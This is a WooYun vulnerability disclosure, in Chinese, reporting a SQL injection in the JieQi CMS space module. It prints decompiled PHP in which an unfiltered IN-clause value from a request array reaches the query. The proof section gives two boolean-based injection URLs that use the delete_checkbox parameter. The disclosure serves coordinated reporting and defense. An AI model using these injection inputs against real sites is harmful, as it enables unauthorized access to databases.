当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2013-43908

漏洞标题: 杰奇CMS 1.7商业版注入漏洞

相关厂商: jieqi.com

漏洞作者: Phale

提交时间: 2013-11-25 17:20

公开时间: 2014-02-23 17:20

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 5

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 杰奇CMS 1.7商业漏洞

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-25: 细节已通知厂商并且等待厂商处理中
2013-11-25: 厂商已经确认,细节仅向厂商公开
2013-11-28: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-01-19: 细节向核心白帽子及相关领域专家公开
2014-01-29: 细节向普通白帽子公开
2014-02-08: 细节向实习白帽子公开
2014-02-23: 细节向公众公开

简要描述:

杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。

详细说明:

code 区域
class criteria extends criteriaelement
{
var $column; //字段
var $operator; //分隔符
var $value; //值
function criteria( $_obfuscate_eZJe9OBy, $_obfuscate_VgKtFeg = "", $_obfuscate_JChWBNMCFOA = "=" )
{
$this->column = $_obfuscate_eZJe9OBy;
$this->value = $_obfuscate_VgKtFeg;
$this->operator = $_obfuscate_JChWBNMCFOA;
}
function render( )
{
if ( !empty( $this->column ) )
{
$_obfuscate_yHkENun4 = $this->column." ".$this->operator;
..................................
if ( isset( $this->value ) )
..................................
//当分隔符为in时没有对值有任何处理。EditPlus搜索含有"IN"的语句发现了注入。
if ( strtoupper( $this->operator ) == "IN" )
{
$_obfuscate_yHkENun4 .= " ".$this->value;
return $_obfuscate_yHkENun4;
}
//引入单引号
$_obfuscate_yHkENun4 .= " '".jieqi_dbslashes( trim( $this->value ) )."'";
}
return $_obfuscate_yHkENun4;
------------------------------------------------------------------------------------------
switch ( $_REQUEST[action] )
{
case "do_edit" :
include_once( $jieqiModules['space']['path']."/class/blogcat.php" );
$blog_cat_handler = jieqispaceblogcathandler::getinstance( "JieqiSpaceBlogCatHandler" );
if ( $_REQUEST['delete_checkbox'] )
{
$tmpstr = "(".implode( ",", $_REQUEST['delete_checkbox'] ).")";
$criteria = new criteriacompo( new criteria( "`id`", $tmpstr, "in" ) ); //id in ()
$criteria->add( new criteria( "`uid`", $uid ) );
$criteria->add( new criteria( "`type`", $_REQUEST['type'], "=" ) );
$criteria->add( new criteria( "`default_cat`", 1, "!=" ) );
$blog_cat_handler->queryobjects( $criteria );
$v = $blog_cat_handler->getobject( );
if ( !empty( $v ) )
{
$num = $v->getvar( "num" );
$blog_cat_handler->delete( $criteria );
unset( $criteria );
}

漏洞证明:

code 区域
http://localhost/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23







code 区域
http://localhost/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23

修复方案:

版权声明:转载请注明来源 Phale@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-25 18:29

厂商回复:

由于对用户提交变量过滤不严产生的漏洞。
本漏洞来自JIEQI CMS 1.6版本。
1.7及以上版本默认无space模块,如果有,则是个人私自整合行为。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录